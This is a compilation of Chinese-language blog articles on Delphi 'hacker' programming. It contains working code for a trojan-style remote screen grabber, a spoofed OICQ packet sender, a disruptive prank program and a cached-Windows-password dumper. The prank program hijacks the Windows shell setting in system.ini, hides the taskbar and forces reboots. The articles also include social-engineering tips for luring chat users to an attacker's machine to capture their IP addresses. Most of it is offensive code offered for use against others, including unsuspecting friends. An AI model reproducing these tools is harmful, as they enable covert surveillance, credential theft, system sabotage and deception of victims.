用DELPHI实现的一些国内黑客程序技巧

实际上目前所有的OICQ探测方法都一样,发送一个OICQ消息给对方,凭借OICQ 的返回信息来判断对方的OICQ号码,具体的DELPHI实现如下: NMUDP1是ICS控件包的UDP控件。 

NMUDP1.ReportLevel := Status_Basic; 
NMUDP1.RemoteHost := edit1.Text; 
NMUDP1.RemotePort := 4000; 


UdpTmpStr :=#$02 +#$03 +#$0a +#$00 +#$78 +#13 +#$A 
+ '88888' +#$1f +#$30 +#$1f + #$33 + #$39 +#$1f 
+FormatDateTime('yyyy-mm-dd',now) 
+#$1f 
+FormatDateTime('hh:mm:ss',now) 
+#$1f 
+ '你正在被某位朋友查询。他使用了追捕这个工具软件(http://www.zhuibu.com/)进行探测,此OICQ号码已经被反馈给对方。' 

+ '信息所提示的OICQ号码为虚假号码,但可以即时回复。' + #$03; 

if OicqCheck.Checked then begin 
for SendUdpNum:=1 to 10 do begin 
MyStream := TMemoryStream.Create; 
try 
MyStream.Write(UdpTmpStr[1], Length(UdpTmpStr)); 
NMUDP1.SendStream(MyStream); 
finally 
MyStream.Free; 
end; 
end; 
end; 
待续.. 
感谢冯志宏先生





远程屏幕抓取,写一个木马程序必备的技巧 
Thursday,Oct-26 


檀革勤 [互联网]


木马的一个很重要的功能就是远程监视屏幕,下面的文章讲述了怎样利用UDP协议来实现,而不是我们通常用到的tcp/ip协议,很有特色,值得一学。 

一、软硬件要求。 

Windows95/98对等网,用来监视的计算机(以下简称主控机)和被监视的计算机(以下简称受控机)都必须装有TCP/IP 
协议,并正确配置。如没有网络,也可以在一台计算机上进行调试。 

二、实现方法。 

编制两个应用程序,一个为VClient.exe,装在受控机上,另一个为VServer.exe,装在主控机上。VServer.exe指定要监视的受控机的IP地址和将要在受控机屏幕上抓取区域的大小和位置,并发出屏幕抓取指令给VClient.exe,VClient.exe得到指令后,在受控机屏幕上选取指定区域,生成数据流,将其发回主控机,并在主控机上显示出抓取区域的BMP图象。由以上过程可以看出,该方法的关键有二:一是如何在受控机上进行屏幕抓取,二是如何通过TCP/IP协议在两台计算机中传输数据。 


UDP(User Datagram 
Protocol,意为用户报文协议)是Internet上广泛采用的通信协议之一。与TCP协议不同,它是一种非连接的传输协议,没有确认机制,可靠性不如TCP,但它的效率却比TCP高,用于远程屏幕监视还是比较适合的。同时,UDP控件不区分服务器端和客户端,只区分发送端和接收端,编程上较为简单,故选用UDP协议,使用Delphi 
4.0提供的TNMUDP控件。 

三、创建演示程序。 

第一步,编制VClient.exe文件。新建Delphi工程,将默认窗体的Name属性设为“Client”。加入TNMUDP控件,Name属性设为“CUDP”;LocalPort属性设为“1111”,让控件CUDP监视受控机的1111端口,当有数据发送到该口时,触发控件CUDP的OnDataReceived事件;RemotePort属性设为“2222”,当控件CUDP发送数据时,将数据发到主控机的2222口。 


在implementation后面加入变量定义 

const BufSize=2048;{ 发送每一笔数据的缓冲区大小 } 
var 
BmpStream:TMemoryStream; 
LeftSize:Longint;{ 发送每一笔数据后剩余的字节数 } 

为Client的OnCreate事件添加代码: 
procedure TClient.FormCreate(Sender: TObject); 
begin 
BmpStream:=TMemoryStream.Create; 
end; 

为Client的OnDestroy事件添加代码: 
procedure TClient.FormDestroy(Sender: TObject); 
begin 
BmpStream.Free; 
end; 

为控件CUDP的OnDataReceived事件添加代码: 
procedure TClient.CUDPDataReceived(Sender: TComponent; 
NumberBytes: Integer; FromIP: String); 
var 
CtrlCode:array[0..29] of char; 
Buf:array[0..BufSize-1] of char; 
TmpStr:string; 
SendSize,LeftPos,TopPos,RightPos,BottomPos:integer; 
begin 
CUDP.ReadBuffer(CtrlCode,NumberBytes);{ 读取控制码 } 
if CtrlCode[0]+CtrlCode[1]+CtrlCode[2]+CtrlCode[3]='show' then 
begin { 控制码前4位为“show”表示主控机发出了抓屏指令 } 
if BmpStream.Size=0 then { 没有数据可发,必须截屏生成数据 } 
begin 
TmpStr:=StrPas(CtrlCode); 
TmpStr:=Copy(TmpStr,5,Length(TmpStr)-4); 
LeftPos:=StrToInt(Copy(TmpStr,1,Pos(':',TmpStr)-1)); 
TmpStr:=Copy(TmpStr,Pos(':',TmpStr)+1,Length(TmpStr) 
-Pos(':',TmpStr)); 
TopPos:=StrToInt(Copy(TmpStr,1,Pos(':',TmpStr)-1)); 
TmpStr:=Copy(TmpStr,Pos(':',TmpStr)+1,Length(TmpStr)- 
Pos(':',TmpStr)); 
RightPos:=StrToInt(Copy(TmpStr,1,Pos(':',TmpStr)-1)); 
BottomPos:=StrToInt(Copy(TmpStr,Pos(':',TmpStr 
)+1,Length(TmpStr)-Pos(':',TmpStr))); 
ScreenCap(LeftPos,TopPos,RightPos,BottomPos); { 
截取屏幕 } 
end; 
if LeftSize>BufSize then SendSize:=BufSize 
else SendSize:=LeftSize; 
BmpStream.ReadBuffer(Buf,SendSize); 
LeftSize:=LeftSize-SendSize; 
if LeftSize=0 then BmpStream.Clear;{ 清空流 } 
CUDP.RemoteHost:=FromIP; { FromIP为主控机IP地址 } 
CUDP.SendBuffer(Buf,SendSize); { 将数据发到主控机的2222口 } 
end; 
end; 

其中ScreenCap是自定义函数,截取屏幕指定区域, 
代码如下: 
procedure TClient.ScreenCap(LeftPos,TopPos, 
RightPos,BottomPos:integer); 
var 
RectWidth,RectHeight:integer; 
SourceDC,DestDC,Bhandle:integer; 
Bitmap:TBitmap; 
begin 
RectWidth:=RightPos-LeftPos; 
RectHeight:=BottomPos-TopPos; 
SourceDC:=CreateDC('DISPLAY','','',nil); 
DestDC:=CreateCompatibleDC(SourceDC); 
Bhandle:=CreateCompatibleBitmap(SourceDC, 
RectWidth,RectHeight); 
SelectObject(DestDC,Bhandle); 
BitBlt(DestDC,0,0,RectWidth,RectHeight,SourceDC, 
LeftPos,TopPos,SRCCOPY); 
Bitmap:=TBitmap.Create; 
Bitmap.Handle:=BHandle; 
BitMap.SaveToStream(BmpStream); 
BmpStream.Position:=0; 
LeftSize:=BmpStream.Size; 
Bitmap.Free; 
DeleteDC(DestDC); 
ReleaseDC(Bhandle,SourceDC); 
end; 
存为“C:/VClient/ClnUnit.pas”和“C:/VClient/VClient.dpr”, 
并编译。 

第二步,编制VServer.exe文件。新建Delphi工程,将窗体的Name属性设为“Server”。加入TNMUDP控件,Name属性设为“SUDP”;LocalPort属性设为“2222”,让控件SUDP监视主控机的2222端口,当有数据发送到该口时,触发控件SUDP的OnDataReceived事件;RemotePort属性设为“1111”,当控件SUDP发送数据时,将数据发到受控机的1111口。加入控件Image1,Align属性设为“alClient”;加入控件Button1,Caption属性设为“截屏”;加入控件Label1,Caption属性设为“左:上:右:下”;加入控件Edit1,Text属性设为“0:0:100:100”;加入控件Label2,Caption属性设为“受控机IP地址”;加入控件Edit2,Text属性设为“127.0.0.1”; 


在implementation后面加入变量定义 
const BufSize=2048; 
var 
RsltStream,TmpStream:TMemoryStream; 

为Server的OnCreate事件添加代码: 
procedure TServer.FormCreate(Sender: TObject); 
begin 
RsltStream:=TMemoryStream.Create; 
TmpStream:=TMemoryStream.Create; 
end; 

为Client的OnDestroy事件添加代码: 
procedure TServer.FormDestroy(Sender: TObject); 
begin 
RsltStream.Free; 
TmpStream.Free; 
end; 

为控件Button1的OnClick事件添加代码: 
procedure TServer.Button1Click(Sender: TObject); 
var ReqCode:array[0..29] of char;ReqCodeStr:string; 
begin 
ReqCodeStr:='show'+Edit1.Text; 
StrpCopy(ReqCode,ReqCodeStr); 
TmpStream.Clear; 
RsltStream.Clear; 
SUDP.RemoteHost:=Edit2.Text; 
SUDP.SendBuffer(ReqCode,30); 
end; 

为控件SUDP的OnDataReceived事件添加代码: 
procedure TServer.SUDPDataReceived(Sender: TComponent; 
NumberBytes: Integer; FromIP: String); 
var ReqCode:array[0..29] of char;ReqCodeStr:string; 
begin 
ReqCodeStr:='show'+Edit1.text; 
StrpCopy(ReqCode,ReqCodeStr); 
SUDP.ReadStream(TmpStream); 
RsltStream.CopyFrom(TmpStream,NumberBytes); 
if NumberBytes< BufSize then { 数据已读完 } 
begin 
RsltStream.Position:=0; 
Image1.Picture.Bitmap.LoadFromStream(RsltStream); 
TmpStream.Clear; 
RsltStream.Clear; 
end 
else 
begin 
TmpStream.Clear; 
ReqCode:='show'; 
SUDP.RemoteHost:=Edit2.Text; 
SUDP.SendBuffer(ReqCode,30); 
end; 
end; 

存为“C:/VServer/SvrUnit.pas”和 
“C:/VServer/VServer.dpr”,并编译。 
---- 四、测试。 

1、本地机测试:在本地机同时运行Vserver.exe和VClient.exe,利用程序的默认设置,即可实现截屏。查看“控制面板”-“网络”-“TCP/IP”-“IP地址”,将程序的“客户IP地址”设为该地址 
,同样正常运行。 

2、远程测试:选一台受控机,运行VClient.exe;另选一台主控机,运行VServer.exe,将“受控机IP地址”即Edit2的内容设为受控机的IP地址,“截屏”即可。以上简要介绍了远程屏幕抓取的实现方法,至于在主控机上一屏同时监视多个受控机,读者可自行完善。以上程序,在Windows98对等网、Delphi 
4.0下调试通过 





利用外壳的妖之吻 
Thursday,Oct-26 


千年老妖 [Delphi编程技巧]


我一直很困惑,为什么一个简单而且粗糙的程序居然流行开了,记得那是好几个月前,和老孔雀无聊地聊天,实在找不到什么兴趣之后,突然想捉弄他一下,就一边聊一边做程序,很简单的几行代码几分钟就搞定,用一个Tinifiles搞定了windows的shell的外壳,一个关机命令,一个热键屏蔽命令,一个timer来倒数延时,一个难看的窗体,组装好了就发过去,就一直不见对方踪影了,晚上看到傲气的小鹰在QQ上,就怀着搞笑的心理发给了他,于是就从傲气开始了下载,这个无聊的软件对一些懂得windows的人来说不构成危害,但是对一些刚刚接触电脑的人,很可能造成对方重新安装系统甚至去格式化硬盘,对此深表歉意。忘记了做成重启动N次后自动恢复。但这个程序本身对数据不造成危害。windows和dos一样,有个shell外壳,启动的时候加载它,就是我们看到的界面,是必须的,和windows的启动运行不一样,是前提,所以很多朋友中了妖之吻之后,拼命改注册表,win.ini,都不行。而且不能删除它,一旦删除,win98就会蓝屏报错,提示请重新安装。:-) 

下面是程序的实现,这些代码与最初的代码有许多地方不一样,还没有完成。因为后来心血来潮想增加点东东,后来放弃了,毕竟还是无聊的东西。 
unit Unit1; 

interface 

uses 
Windows, Messages, SysUtils, Classes,inifiles, Graphics, Controls, 
Forms, Dialogs, 
StdCtrls, ExtCtrls, Buttons; 

type 
TForm1 = class(TForm) 
Timer1: TTimer; 
Label1: TLabel; 
Timer2: TTimer; 
Label2: TLabel; 
SpeedButton1: TSpeedButton; 
procedure Timer1Timer(Sender: TObject); 
procedure FormCreate(Sender: TObject); 
procedure FormClose(Sender: TObject; var Action: TCloseAction); 
procedure Timer2Timer(Sender: TObject); 
procedure SpeedButton1Click(Sender: TObject); 
private 
{ Private declarations } 
public 
{ Public declarations } 
end; 

var 
Form1: TForm1; 

implementation 

{$R *.DFM} 
var 
sysini:tinifile;//定一个ini,准备动手术 
j,i:integer; 
procedure TForm1.Timer1Timer(Sender: TObject); 
begin 
exitwindowsex(ewx_reboot,0);//倒数时间到,关机罗! 
end; 

procedure TForm1.FormCreate(Sender: TObject); 
var 
hregion,wndHandle : THandle; 
wndClass : array[0..50] of Char; 
k:string; 
begin 
hregion:=createellipticrgn(14,200,350,14);//想画个不规则窗体 
setwindowrgn(handle,hregion,true); 
StrPCopy(@wndClass[0], 'Shell_TrayWnd'); 
wndHandle := FindWindow(@wndClass[0], nil); 
ShowWindow(wndHandle, SW_HIDE); 
i:=60; 
SetWindowLong(Application.Handle,GWL_EXSTYLE,WS_EX_TOOLWINDOW); 
systemparametersinfo(97,1,nil,0);//屏蔽热键 
timer1.Enabled:=false; 
sysini:=Tinifile.Create('system.ini'); 
k:=sysini.ReadString('boot','shell',k);//这里准备做成启动20次恢复, 
if (k='explorer') or (k='explorer.exe') then 
begin 
sysini.WriteInteger('mci','mcicount',20); 
sysini.WriteString('boot','shell',application.ExeName);//这里用自己替换掉了shell 
end 
end; 

procedure TForm1.FormClose(Sender: TObject; var Action: TCloseAction); 
begin 
systemparametersinfo(97,0,nil,0);//取消屏蔽 
end; 

procedure TForm1.Timer2Timer(Sender: TObject); 
begin 
i:=i-1; 
label2.Caption:=inttostr(i); 
if i=1 then 
begin 
timer2.Enabled:=false; 
timer1.Enabled:=true; 
j:=sysini.ReadInteger('mci','mcicount',j); 
j:=j-1; 
if j=1 then 
begin 
sysini.WriteString('boot','shell','explorer.exe');//当启动满了20次,恢复shell 
end; 
end; 
end; 

procedure TForm1.SpeedButton1Click(Sender: TObject);//调试用的 
begin 
timer1.Enabled:=false; 
timer2.Enabled:=false; 
application.Terminate; 
systemparametersinfo(97,1,nil,0); 
end; 
end. 
还存在个问题,这个程序里面的代码没有屏蔽掉Alt+F4,可以更换成别的办法。 
10月23日




写一个类PwView密码查看的程序 
Thursday,Oct-26 


不详 [网络收集]


很多朋友用过pwview以及类似的软件吧?一运行windows的密码全找到了,这里给一个原代码,不是老妖写的,是网上搜罗的,里面的代码值得一学,为写自己的hacker软件积累点点滴滴.. 

unit Unit1; 

interface 

uses 
Windows, SysUtils, Classes, Forms, ShellAPI, Controls, StdCtrls; 

type 
TForm1 = class(TForm) 
GroupBox1: TGroupBox; 
ListBox: TListBox; 
Label1: TLabel; 
Label2: TLabel; 
procedure Label1Click(Sender: TObject); 
procedure FormShow(Sender: TObject); 
private 
{ Private declarations } 
public 
hMPR: THandle; 
end; 

var 
Form1: TForm1; 

const 
Count: Integer = 0; 

function WNetEnumCachedPasswords(lp: lpStr; w: Word; b: Byte; PC: PChar; 
dw: DWord): Word; stdcall; 

implementation 

{$R *.DFM} 
function WNetEnumCachedPasswords(lp: lpStr; w: Word; b: Byte; PC: PChar; 
dw: DWord): Word; external mpr name 'WNetEnumCachedPasswords'; 

type 
PWinPassword = ^TWinPassword; 
TWinPassword = record 
EntrySize: Word; 
ResourceSize: Word; 
PasswordSize: Word; 
EntryIndex: Byte; 
EntryType: Byte; 
PasswordC: Char; 
end; 

var 
WinPassword: TWinPassword; 

function AddPassword(WinPassword: PWinPassword; dw: DWord): LongBool; 
stdcall; 
var 
Password: String; 
PC: Array[0..$FF] of Char; 
begin 
inc(Count); 

Move(WinPassword.PasswordC, PC, WinPassword.ResourceSize); 
PC[WinPassword.ResourceSize] := #0; 
CharToOem(PC, PC); 
Password := StrPas(PC); 

Move(WinPassword.PasswordC, PC, WinPassword.PasswordSize + 
WinPassword.ResourceSize); 
Move(PC[WinPassword.ResourceSize], PC, WinPassword.PasswordSize); 
PC[WinPassword.PasswordSize] := #0; 
CharToOem(PC, PC); 
Password := Password + ': ' + StrPas(PC); 

Form1.ListBox.Items.Add(Password); 
Result := True; 
end; 

procedure TForm1.Label1Click(Sender: TObject); 
begin 
ShellExecute(GetDesktopWindow, 'open', 'http://wlhyy.126.com', nil, nil, 
0); 
end; 

procedure TForm1.FormShow(Sender: TObject); 
begin 
if WNetEnumCachedPasswords(nil, 0, $FF, @AddPassword, 0) <> 0 then 
begin 
Application.MessageBox('Can''t load passwords: User is not logon.', 
'Error', mb_Ok or mb_IconWarning); 
Application.Terminate; 
end 
else 
if Count = 0 then 
ListBox.Items.Add('No passwords found...'); 
end; 

end.





大家来当灰客 (二)乱弹IP查询 
Thursday,Oct-26 


千年老妖 [网络天地]


这个网络上最不缺的就是灰客,灰客们的话题永远停留在怎么怎么查找IP上面,为什么了?因为有了IP,顿时天空都明朗了,IGMP炸弹..追捕..ICQ炸弹..木马十八般武艺顿时有了用武之地。灰客们咬来嚼去的所谓之技术,其中所谓之查IP的技术,根本谈不上是什么技术,其实很简单,就这么几个花样...这里慢慢拿出来晒晒太阳.. 

至于古老的从dos下面netstrat这里就不谈了,因为早有人做成了windows版本的。就目前最简单最容易上手的方法和原理浅谈一二,当然,如果你是在电信数据局工作,这个就免看了,去服务器就搞定... 

一个无聊的灰客最喜欢做什么?这个还用说,炸人呗,极端无聊的灰客喜欢做什么?找一段IP挨个炸,一个简单的扫描器就行了,看看那些IP能ping通,稍微有点目标的话,用用追捕的月光搜索,它的原理是利用netbios挨个扫描出一个网段上每个活动IP的计算机名,非常好用,我和几个朋友在网络上自建三角州服务器玩三角,他们怎么找到我的IP呢?就用这个,也不用我挨个通知了,我的计算机名是wlhsoft,他们一扫描就知道了,很实用吧?用来快速准确查找一个长期养马的机器也特别方便。 

当一个豪气万丈的灰客在聊天的时候,在泡MM的时候遇到了对手怎么办?当然是一击必杀了,如果是在oicq上面就方便多了,此类炸弹软件多如牛毛,oicq是基于UDP协议的聊天工具,协议的特性注定了安全性远远跟不上基于TCP/IP协议的工具,oicq的每条信息都包含了你的IP地址,只需要把数据报截获下来分析就知道了,做到程序里面就成了灰客们常用的oicqIP查询的工具,详细做法另文再谈。这是利用软件的缺陷查IP。无需灰客动脑,一切搞定。 

如果是在聊天室里面怎么办?一个web聊天室如果在里面没有权限,看不到IP是很痛苦的,如果这个聊天室支持html,就好办了,我在delphi编程里面的贴介绍了怎么做一个IP猎人,就用它,用你自己制作的软件来抓IP,原理不用多说了,看看那篇贴子就很明白了。只要你和对方的机器有个直接的访问就可以了,用html代码让对方的浏览器直接访问自己的机器,默认80端口,发一个图或者一个音乐,(img 
src=http://你本机IP/xx.jpg)即可,这种方法很古老的,很多聊天室已经不能使用html了,但是又怎么难得到技术高超的灰客呢?嘿嘿,变通一下,用花言巧语吧,欺骗对方来访问你的IP,‘我找到一个好网站哦!!!'此类的话很容易吧?为了更像一点,干脆去免费申请一个 
yahoo.126.com的域名直接指向你的IP,嘿嘿,当然对方连接你,他的浏览器会看到'web地址已经找到’,但是无论如何也打不开了。这种方法是万金油,到处都可以抹,只要你能言善骗,一脸无可挑剔的真诚,警惕性再高的人都会被你抓住.还有几种小方法,比如利用访问日志,聊天室的bug把message.cgi打开了之类的,觉得没多大意思,就上面的几个小办法足以满足一个灰客的日常需要了。下次聊 







怎样用delphi制作一个IPhunter(独孤剑客的IP猎人) 
Thursday,Oct-26 


千年老妖 [delphi编程技巧]


很多朋友用过独孤剑客写的IPhunter吧,它是利用在聊天室发图片的原理查找对方IP,其实不仅仅是聊天室,只要有人对你的机器存在访问,就能够抓到他的IP,甚至主机名,在老妖的软件猎鹿人当中也利用了这个原理,在delphi中是很容易实现的,现在我们用delphi来做一个和IPhunter一模一样的软件。 

有人说现在的程序员成了组装工人,其实很有道理,利用控件模块+少量代码就可以实现,delphi 
5.0提供了丰富的internet控件,利用TCP/IP 
客户端-服务端就可以解决问题。关键的控件是ServerSocket,我们模仿IPhunter的界面用一个button1(按钮),一个combobox1(用于显示),这三个最基本的控件放置到空白窗体上就可以开始写代码了 
。 
首先,这个combobox1必须能显示多个IP,我们定一个变量y来累加combobox1.items[y], 
var y:integer; 
我们的思路如下,当ServerSocket活动的port(端口)收到基于TCP/IP协议的连结请求时候,返回对方的IP值,传递给combobox显示出来。由button1控制ServerSocket的激活,也就是打开关闭端口。 

我们在ServerSocket的On ClientConnect事件中加入一下代码 
procedure TForm1.ServerSocket11ClientConnect(Sender: TObject; 
Socket: TCustomWinSocket); 
begin 
combobox1.Items.Insert(y,'');//加入一条空纪录 
combobox1.Items[y]:=socket.RemoteAddress;//获取对方的IP 
label1.Text:='共捕获'+inttostr(y+1)+'个IP';//用一个标签来显示一共抓了多少IP 
y:=y+1;//计数变量加1 
socket.Close; 
end; 
现在,将button1的caption属性设置为 '开始',在它的单击事件中加入以下代码 
procedure TForm1.SpeedButton7Click(Sender: TObject); 
begin 
if speedbutton7.Caption='开始' then 
begin 
serversocket11.Port:=80;//这句可以在serversocket属性中设定,捕获浏览器的连接 
ServerSocket11.Active:=true;//激活端口 
speedbutton7.Caption:='停止'; 
end 
else 
begin 
serversocket11.Active:=false;//关闭端口 
speedbutton7.Caption:='开始'; 
combobox1.Clear;//结束捕获,清空历史信息 
y:=0;//计数变量复位 
end; 
end; 
现在一个IPhunter基本就可以使用了,这只是很简单原型,加上您自己精心制作的界面,就是一个网络灰客工具了,这个功能也集成到了猎鹿人里面,这里说到的只是ServerSocket最基本的一点功能而已,加上ClientSocket就可以做一个聊天工具,只用ClientSocket可以做一个和代理猎手一样的扫描软件,这些在老妖以后的文章中陆续介绍。
阅读更多

没有更多推荐了,返回首页